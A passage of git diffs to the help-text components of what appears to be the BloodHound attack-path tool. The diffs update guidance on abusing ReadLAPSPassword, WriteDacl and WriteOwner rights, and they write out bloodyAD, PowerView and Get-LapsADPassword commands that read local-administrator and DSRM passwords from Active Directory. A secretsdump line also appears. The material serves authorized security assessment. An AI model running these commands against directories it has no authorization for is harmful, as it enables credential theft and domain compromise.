-                The local administrator password for a computer managed by LAPS is stored in the confidential LDAP
-                attribute, "ms-mcs-AdmPwd".
+                For systems using legacy LAPS, the following AD computer object properties are relevant:
+                - **ms-Mcs-AdmPwd**: The plaintext LAPS password.
+                - **ms-Mcs-AdmPwdExpirationTime**: The LAPS password expiration time.
+            </Typography>
+
+            <Typography variant='body2'>
+                For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                - **msLAPS-Password**: The plaintext LAPS password.
+                - **msLAPS-PasswordExpirationTime**: The LAPS password expiration time.
+                - **msLAPS-EncryptedPassword**: The encrypted LAPS password.
+                - **msLAPS-EncryptedPasswordHistory**: The encrypted LAPS password history.
+                - **msLAPS-EncryptedDSRMPassword**: The encrypted Directory Services Restore Mode (DSRM) password.
+                - **msLAPS-EncryptedDSRMPasswordHistory**: The encrypted DSRM password history.
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx
@@ -14,7 +14,7 @@
 //
 // SPDX-License-Identifier: Apache-2.0
 
-import { Link, Typography } from '@mui/material';
+import { Typography } from '@mui/material';
 import { FC } from 'react';
 import { EdgeInfoProps } from '../index';
 
@@ -22,20 +22,17 @@ const LinuxAbuse: FC<EdgeInfoProps> = () => {
     return (
         <>
             <Typography variant='body2'>
-                Sufficient control on a computer object is abusable when the computer's local admin account credential
-                is controlled with LAPS. The clear-text password for the local administrator account is stored in an
-                extended attribute on the computer object called ms-Mcs-AdmPwd.
+                Read the LAPS password attributes listed in the General section.
+            </Typography>
+            <Typography variant='body2'>
+                Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
+            </Typography>
+            <Typography component={'pre'}>
+                {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
             </Typography>
 
             <Typography variant='body2'>
-                <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                    pyLAPS
-                </Link>{' '}
-                can be used to retrieve LAPS passwords:
-            </Typography>
-
-            <Typography component={'pre'}>
-                {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
+                See Windows abuse for retrieving and decrypting the encrypted attributes.
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/LinuxAbuse.tsx
@@ -21,14 +21,14 @@ import { EdgeInfoProps } from '../index';
 const LinuxAbuse: FC<EdgeInfoProps> = () => {
     return (
         <>
-            <Typography variant='body2'>
-                Read the LAPS password attributes listed in the General section.
-            </Typography>
+            <Typography variant='body2'>Read the LAPS password attributes listed in the General section.</Typography>
             <Typography variant='body2'>
                 Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
             </Typography>
             <Typography component={'pre'}>
-                {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
+                {
+                    "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                }
             </Typography>
 
             <Typography variant='body2'>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx
@@ -31,16 +31,22 @@ const References: FC = () => {
                 https://adsecurity.org/?p=3164
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
             <br />
         </Box>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/References.tsx
@@ -30,9 +30,19 @@ const References: FC = () => {
             <Link target='_blank' rel='noopener' href='https://adsecurity.org/?p=3164'>
                 https://adsecurity.org/?p=3164
             </Link>
-            <Link target='_blank' rel='noopener' href='https://www.thehacker.recipes/ad/movement/dacl/readlapspassword'>
-                https://www.thehacker.recipes/ad/movement/dacl/readlapspassword
+            <br />
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
+            </Link>
+            <br />
         </Box>
     );
 };

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx
@@ -21,9 +21,7 @@ import { EdgeInfoProps } from '../index';
 const WindowsAbuse: FC<EdgeInfoProps> = () => {
     return (
         <>
-            <Typography variant='body2'>
-                Read the LAPS password attributes listed in the General section.
-            </Typography>
+            <Typography variant='body2'>Read the LAPS password attributes listed in the General section.</Typography>
             <Typography variant='body2'>
                 Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
             </Typography>
@@ -34,14 +32,17 @@ const WindowsAbuse: FC<EdgeInfoProps> = () => {
             <Typography variant='body2'>
                 Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
             </Typography>
-            <Typography component={'pre'}>
-                {'Get-LapsADPassword "WIN10" -AsPlainText'}
-            </Typography>
+            <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
 
             <Typography variant='body2'>
-                The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-                lapsv2decrypt
-            </Link>{' '} (dotnet or BOF).
+                The encrypted attributes can also be retrieved and decrypted using{' '}
+                <Link
+                    target='_blank'
+                    rel='noopener'
+                    href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                    lapsv2decrypt
+                </Link>{' '}
+                (dotnet or BOF).
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/ReadLAPSPassword/WindowsAbuse.tsx
@@ -15,35 +15,33 @@
 // SPDX-License-Identifier: Apache-2.0
 
 import { FC } from 'react';
-import { Typography } from '@mui/material';
+import { Link, Typography } from '@mui/material';
 import { EdgeInfoProps } from '../index';
 
-const WindowsAbuse: FC<EdgeInfoProps> = ({ sourceName, sourceType }) => {
+const WindowsAbuse: FC<EdgeInfoProps> = () => {
     return (
         <>
             <Typography variant='body2'>
-                To abuse this permission with PowerView's Get-DomainObject, first import PowerView into your agent
-                session or into a PowerShell instance at the console. You may need to authenticate to the Domain
-                Controller as{' '}
-                {sourceType === 'User'
-                    ? `${sourceName} if you are not running a process as that user`
-                    : `a member of ${sourceName} if you are not running a process as a member`}
-                . To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples
-                comes from the PowerView help documentation):
+                Read the LAPS password attributes listed in the General section.
             </Typography>
-
+            <Typography variant='body2'>
+                Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+            </Typography>
             <Typography component={'pre'}>
-                {"$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n" +
-                    "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)"}
+                {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
             </Typography>
 
             <Typography variant='body2'>
-                Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as{' '}
-                {sourceName}:
+                Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+            </Typography>
+            <Typography component={'pre'}>
+                {'Get-LapsADPassword "WIN10" -AsPlainText'}
             </Typography>
 
-            <Typography component={'pre'}>
-                {'Get-DomainObject windows1 -Credential $Cred -Properties "ms-mcs-AdmPwd",name'}
+            <Typography variant='body2'>
+                The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                lapsv2decrypt
+            </Link>{' '} (dotnet or BOF).
             </Typography>
         </>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx
@@ -230,22 +230,42 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            Full control of a computer object is abusable when the computer's local admin account
-                            credential is controlled with LAPS. The clear-text password for the local administrator
-                            account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With
-                            full control of the computer object, you may have the ability to read this attribute, or
-                            grant yourself the ability to read the attribute by modifying the computer object's security
-                            descriptor.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
-                            <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                                pyLAPS
-                            </Link>{' '}
-                            can be used to retrieve LAPS passwords:
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
+                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
                         </Typography>
+                        <Typography variant='body2'>
+                            See Windows abuse for retrieving and decrypting the encrypted attributes.
+                        </Typography>
+
                         <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
                         <Typography variant='body2'>
                             First, if an attacker does not control an account with an SPN set, a new attacker-controlled
@@ -412,25 +432,6 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                     <Typography component={'pre'}>
                         {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
-                    </Typography>
-
-                    <Typography variant='body1'> Retrieve LAPS Passwords </Typography>
-
-                    <Typography variant='body2'>
-                        If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the
-                        AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS
-                        passwords domain-wise.
-                    </Typography>
-
-                    <Typography variant='body2'>
-                        <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                            pyLAPS
-                        </Link>{' '}
-                        can be used for that purpose:
-                    </Typography>
-
-                    <Typography component={'pre'}>
-                        {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
                     </Typography>
 
                     <Typography variant='body1'>Generic Descendent Object Takeover</Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/LinuxAbuse.tsx
@@ -230,7 +230,8 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
 
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator)
+                            password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
                             For systems using legacy LAPS, the following AD computer object properties are relevant:
@@ -240,8 +241,9 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -251,16 +253,19 @@ const LinuxAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> = (
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
+                            {
+                                "bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             See Windows abuse for retrieving and decrypting the encrypted attributes.

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx
@@ -154,6 +154,18 @@ const References: FC = () => {
                 href='https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53'>
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
+            https://github.com/CravateRouge/bloodyAD
+            </Link>
         </Box>
     );
 };

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/References.tsx
@@ -155,16 +155,22 @@ const References: FC = () => {
                 https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
-            https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword'>
+                https://learn.microsoft.com/en-us/powershell/module/laps/get-lapsadpassword
             </Link>
             <br />
-            <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-            https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt
             </Link>
             <br />
             <Link target='_blank' rel='noopener' href='https://github.com/CravateRouge/bloodyAD'>
-            https://github.com/CravateRouge/bloodyAD
+                https://github.com/CravateRouge/bloodyAD
             </Link>
         </Box>
     );

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
@@ -283,10 +283,7 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         </Typography>
                         <Typography variant='body2'>
                             The GenericAll permission grants {sourceName} the ability to obtain the LAPS (RID 500
-                            administrator) password of {targetName}. {sourceName} can do so by listing a computer
-                            object's AD properties with PowerView using Get-DomainComputer {targetName}. The value of
-                            the ms-mcs-AdmPwd property will contain password of the administrative local account on{' '}
-                            {targetName}.
+                            administrator) password of {targetName}.
                         </Typography>
 
                         <Typography variant='body2'>
@@ -299,6 +296,49 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                         <Typography variant='body2'>
                             Alternatively, GenericAll on a computer object can be used to perform a Resource-Based
                             Constrained Delegation attack.
+                        </Typography>
+
+                        <Typography variant='body1'> Retrieve LAPS Password </Typography>
+                        <Typography variant='body2'>
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
+                        </Typography>
+                        <Typography component={'pre'}>
+                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
+                        </Typography>
+                        <Typography variant='body2'>
+                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                            lapsv2decrypt
+                        </Link>{' '} (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteDacl/WindowsAbuse.tsx
@@ -307,8 +307,9 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -318,27 +319,33 @@ const WindowsAbuse: FC<EdgeInfoProps & { targetId: string; haslaps: boolean }> =
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with PowerView:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'}
+                            {
+                                'Get-DomainComputer "MachineName" -Properties "cn","ms-mcs-admpwd","ms-mcs-admpwdexpirationtime"'
+                            }
                         </Typography>
                         <Typography variant='body2'>
                             Encrypted attributes can be decrypted using Microsoft's LAPS PowerShell module. For example:
                         </Typography>
-                        <Typography component={'pre'}>
-                            {'Get-LapsADPassword "WIN10" -AsPlainText'}
-                        </Typography>
+                        <Typography component={'pre'}>{'Get-LapsADPassword "WIN10" -AsPlainText'}</Typography>
                         <Typography variant='body2'>
-                            The encrypted attributes can also be retrieved and decrypted using <Link target='_blank' rel='noopener' href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
-                            lapsv2decrypt
-                        </Link>{' '} (dotnet or BOF).
+                            The encrypted attributes can also be retrieved and decrypted using{' '}
+                            <Link
+                                target='_blank'
+                                rel='noopener'
+                                href='https://github.com/xpn/RandomTSScripts/tree/master/lapsv2decrypt'>
+                                lapsv2decrypt
+                            </Link>{' '}
+                            (dotnet or BOF).
                         </Typography>
 
                         <Typography variant='body1'> Shadow Credentials attack </Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx
@@ -250,22 +250,42 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
 
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            Full control of a computer object is abusable when the computer's local admin account
-                            credential is controlled with LAPS. The clear-text password for the local administrator
-                            account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd. With
-                            full control of the computer object, you may have the ability to read this attribute, or
-                            grant yourself the ability to read the attribute by modifying the computer object's security
-                            descriptor.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
-                            <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                                pyLAPS
-                            </Link>{' '}
-                            can be used to retrieve LAPS passwords:
+                            For systems using legacy LAPS, the following AD computer object properties are relevant:
+                            <br />
+                            <b>- ms-Mcs-AdmPwd</b>: The plaintext LAPS password
+                            <br />
+                            <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                        </Typography>
+<Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                            <br />
+                            <b>- msLAPS-Password</b>: The plaintext LAPS password
+                            <br />
+                            <b>- msLAPS-PasswordExpirationTime</b>: The LAPS password expiration time
+                            <br />
+                            <b>- msLAPS-EncryptedPassword</b>: The encrypted LAPS password
+                            <br />
+                            <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <br />
+                            <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
+                            <br /> 
+                        </Typography>
+                        <Typography variant='body2'>
+                            Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
-                            {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
+                            {"bloodyAD --host $DC_IP -d $DOMAIN -u $USER -p $PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime"}
                         </Typography>
+                        <Typography variant='body2'>
+                            See Windows abuse for retrieving and decrypting the encrypted attributes.
+                        </Typography>
+
                         <Typography variant='body1'> Resource-Based Constrained Delegation </Typography>
                         <Typography variant='body2'>
                             First, if an attacker does not control an account with an SPN set, a new attacker-controlled
@@ -448,25 +468,6 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
 
                     <Typography component={'pre'}>
                         {"secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"}
-                    </Typography>
-
-                    <Typography variant='body1'> Retrieve LAPS Passwords </Typography>
-
-                    <Typography variant='body2'>
-                        If FullControl (GenericAll) is obtained on the domain, instead of granting DCSync rights, the
-                        AllExtendedRights permission included grants {sourceName} enough permissions to retrieve LAPS
-                        passwords domain-wise.
-                    </Typography>
-
-                    <Typography variant='body2'>
-                        <Link target='_blank' rel='noopener' href='https://github.com/p0dalirius/pyLAPS'>
-                            pyLAPS
-                        </Link>{' '}
-                        can be used for that purpose:
-                    </Typography>
-
-                    <Typography component={'pre'}>
-                        {'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'}
                     </Typography>
 
                     <Typography variant='body1'>Generic Descendent Object Takeover</Typography>

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx
@@ -250,7 +250,8 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
 
                         <Typography variant='body1'> Retrieve LAPS Password </Typography>
                         <Typography variant='body2'>
-                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator) password for {targetName}.
+                            The GenericAll permission allows {sourceName} to retrieve the LAPS (RID 500 administrator)
+                            password for {targetName}.
                         </Typography>
                         <Typography variant='body2'>
                             For systems using legacy LAPS, the following AD computer object properties are relevant:
@@ -260,8 +261,9 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
                             <b>- ms-Mcs-AdmPwdExpirationTime</b>: The LAPS password expiration time
                             <br />
                         </Typography>
-<Typography variant='body2'>
-                            For systems using Windows LAPS (2023 edition), the following AD computer object properties are relevant:
+                        <Typography variant='body2'>
+                            For systems using Windows LAPS (2023 edition), the following AD computer object properties
+                            are relevant:
                             <br />
                             <b>- msLAPS-Password</b>: The plaintext LAPS password
                             <br />
@@ -271,16 +273,19 @@ const LinuxAbuse: FC<EdgeInfoProps & { haslaps: boolean }> = ({ sourceName, targ
                             <br />
                             <b>- msLAPS-EncryptedPasswordHistory</b>: The encrypted LAPS password history
                             <br />
-                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM) password
+                            <b>- msLAPS-EncryptedDSRMPassword</b>: The encrypted Directory Services Restore Mode (DSRM)
+                            password
                             <br />
                             <b>- msLAPS-EncryptedDSRMPasswordHistory</b>: The encrypted DSRM password history
-                            <br /> 
+                            <br />
                         </Typography>
                         <Typography variant='body2'>
                             Plaintext attributes can be read using a simple LDAP client. For example, with bloodyAD:
                         </Typography>
                         <Typography component={'pre'}>
